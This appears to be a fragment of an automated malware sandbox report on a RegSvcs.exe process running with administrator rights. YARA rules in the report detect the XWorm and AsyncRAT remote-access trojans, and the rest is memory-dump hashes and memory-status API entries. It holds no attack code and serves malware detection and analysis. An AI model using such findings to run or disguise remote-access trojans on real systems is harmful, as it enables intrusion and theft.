                                            Start date:28/01/2025
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0xd00000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3883270268.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            Executed Functions

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1476678104.00007FFB4B460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B460000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffb4b460000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7a03e74d0550f3104f0af9a03bf424306ac6c1a1de7f3795126b702ec29e94c6
                                            • Instruction ID: 4286ef9a6de5f89ef737a3e8e541afa4c1e10ead9b11d27128e54c34bd27041c
                                            • Opcode Fuzzy Hash: 7a03e74d0550f3104f0af9a03bf424306ac6c1a1de7f3795126b702ec29e94c6
                                            • Instruction Fuzzy Hash: C6E237B1A0DB894FE79AAB3C98552B47FE1EF46320B0841FFD58DC71A3D9189C168391
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1475679368.00007FFB4B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffb4b390000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                            • Instruction ID: 5e247bc9ae63f56cbe337aeaf396ab2df403caf1e66fed64946159981e83bf09
                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                            • Instruction Fuzzy Hash: AB01677111CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3661DA36E882CB45
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1475679368.00007FFB4B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffb4b390000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8e76f35a864409e6a9587771b42a91374c7ddae0df5f03d2b08a66a465494669
                                            • Instruction ID: f0f091fc64725d6f1d1a5f5d8374b2ced443c8085b4be060999f62b16dc3e540
                                            • Opcode Fuzzy Hash: 8e76f35a864409e6a9587771b42a91374c7ddae0df5f03d2b08a66a465494669
                                            • Instruction Fuzzy Hash: 17015A30A0864ACFDB59EF69D8906F973B2FF56315B50456DD12AC3291CA36A852CB40
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1476678104.00007FFB4B460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B460000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffb4b460000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1db1e6ef91b3dd467bd51f2a68eab19269f856fc946f40a60937643cda07f60e
                                            • Instruction ID: 40328c81c38f71f8cfaef299eb359def361218503aceb00326f2f3ee157ece05
                                            • Opcode Fuzzy Hash: 1db1e6ef91b3dd467bd51f2a68eab19269f856fc946f40a60937643cda07f60e
                                            • Instruction Fuzzy Hash: 90F02452F0D9D90BFBE9BA7C64062F96BC1DF45621B0885BADA8DC3243DC0C9C2543C1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1475679368.00007FFB4B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffb4b390000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df32c89e29bb800c469fdb8f875865b77258d8e1cf8bc716b528746609c96d56
                                            • Instruction ID: f530faee17b7980421ca72401808183fd49ac9f968ac0a6c68111b2594f8a5ab
                                            • Opcode Fuzzy Hash: df32c89e29bb800c469fdb8f875865b77258d8e1cf8bc716b528746609c96d56
                                            • Instruction Fuzzy Hash: F1F017B4E0821A8FEB54EFA9C6816BFB7F1EB54311F108669D105E7254DB38AA408B90
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1475679368.00007FFB4B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffb4b390000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c99602ede571d9b5687628fb827da87e4e5eca8e9fc30cadfba269893e912382
                                            • Instruction ID: 71ebe79ba0acf9eb79a2e8fd89806a6aeabda192f6cac10a350df7a09461382c
                                            • Opcode Fuzzy Hash: c99602ede571d9b5687628fb827da87e4e5eca8e9fc30cadfba269893e912382
                                            • Instruction Fuzzy Hash: 56E0B66094555B9FD7A1EF28C8197A9B6E1AF04200F0040FA840DD76A2EE341DC99B40

                                            Executed Functions

                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0149811A), ref: 01498207
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3882735121.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1490000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: 9b9d25a485172600ebafed066f64626420b4a7d67c0cdb62b0ffe0b3e232370f
                                            • Instruction ID: db38a300cd28e9dbffb9fb7f29573e51cb445f3c37e44280daac453188f50ad8
                                            • Opcode Fuzzy Hash: 9b9d25a485172600ebafed066f64626420b4a7d67c0cdb62b0ffe0b3e232370f
                                            • Instruction Fuzzy Hash: 751100B1C0065ADBDB14CF9AC444B9EFBF4AB48220F24816AE818A7251D378A941CFA5
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0149811A), ref: 01498207
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3882735121.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1490000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: e76dada379aa1509142a6c821065b9ea4f6ecc6b62659f8984fa66b7aa8b19ee
                                            • Instruction ID: f546db0f08139e2cf7b779e9f079044be475b614f184dcc7d12c30b34fcc7de3
                                            • Opcode Fuzzy Hash: e76dada379aa1509142a6c821065b9ea4f6ecc6b62659f8984fa66b7aa8b19ee
                                            • Instruction Fuzzy Hash: 4511D0B1C0065ADFDB14CFAAD444BDEFBF4AB48210F15826AD818A7241D378A945CFA5